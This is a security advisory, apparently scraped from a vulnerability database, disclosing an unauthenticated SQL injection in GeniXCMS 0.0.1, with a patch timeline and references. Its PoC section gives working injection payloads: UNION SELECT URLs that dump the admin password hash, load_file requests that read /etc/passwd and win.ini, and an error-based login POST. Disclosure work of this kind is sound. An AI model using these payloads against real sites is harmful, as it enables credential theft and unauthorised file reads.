Gjoko KrsticZSL-2015-5232GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
7.9 High
AI Score
Confidence
Low
0.013 Low
EPSS
Percentile
86.2%
Title: GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit
Advisory ID: ZSL-2015-5232
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (3/5)
Release Date: 10.03.2015
Summary
GenixCMS is a PHP Based Content Management System and Framework (CMSF). It’s a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to Advanced Developer. Some manual configurations are needed to make this application to work.
Description
Input passed via the ‘page’ GET parameter and the ‘username’ POST parameter is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Vendor
MetalGenix - <http://www.genixcms.org>
Affected Version
0.0.1
Tested On
nginx/1.4.6 (Ubuntu)
Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vendor Status
[05.03.2015] Vulnerability discovered.
[05.03.2015] Vendor contacted.
[06.03.2015] Vendor responds asking more details.
[06.03.2015] Sent details to the vendor.
[07.03.2015] Vendor promises fix soon.
[10.03.2015] Vendor releases patched version.
[10.03.2015] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://blog.metalgenix.com/update-security-fix-and-add-newsletter-module/16>
[2] <https://github.com/semplon/GeniXCMS/commit/698245488343396185b1b49e7482ee5b25541815>
[3] <http://www.exploit-db.com/exploits/36321/>
[4] <http://osvdb.org/show/osvdb/119392>
[5] <http://osvdb.org/show/osvdb/119393>
[6] <http://cxsecurity.com/issue/WLB-2015030067>
[7] <http://packetstormsecurity.com/files/130770>
[8] <https://exchange.xforce.ibmcloud.com/#/vulnerabilities/101498>
[9] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-2679>
[10] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2679>
Changelog
[10.03.2015] - Initial release
[11.03.2015] - Added reference [4], [5], [6] and [7]
[13.03.2015] - Added reference [8]
[24.03.2015] - Added reference [9] and [10]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit
Vendor: MetalGenix
Product web page: http://www.genixcms.org
Affected version: 0.0.1
Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
Advanced Developer. Some manual configurations are needed to make this application to
work.
Desc: Input passed via the 'page' GET parameter and the 'username' POST parameter is not
properly sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
Tested on: nginx/1.4.6 (Ubuntu)
Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5232
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5232.php
05.03.2015
---
Get admin user/pass hash:
-------------------------
http://localhost/genixcms/index.php?page=1' union all select 1,2,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and 'j'='j
Read file (C:\windows\win.ini) and MySQL version:
-------------------------------------------------
http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x433a5c77696e646f77735c77696e2e696e69),4,@@version,6,7,8,9,10 and 'j'='j
Read file (/etc/passwd) and MySQL version:
------------------------------------------
http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x2f6574632f706173737764),4,@@version,6,7,8,9,10 and 'j'='j
Get admin user/pass hash:
-------------------------
POST /genixcms/gxadmin/login.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Accept: */*
User-Agent: ZSLScan_1.4
Connection: Close
password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login=
</p></body></html>Related
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
7.9 High
AI Score
Confidence
Low
0.013 Low
EPSS
Percentile
86.2%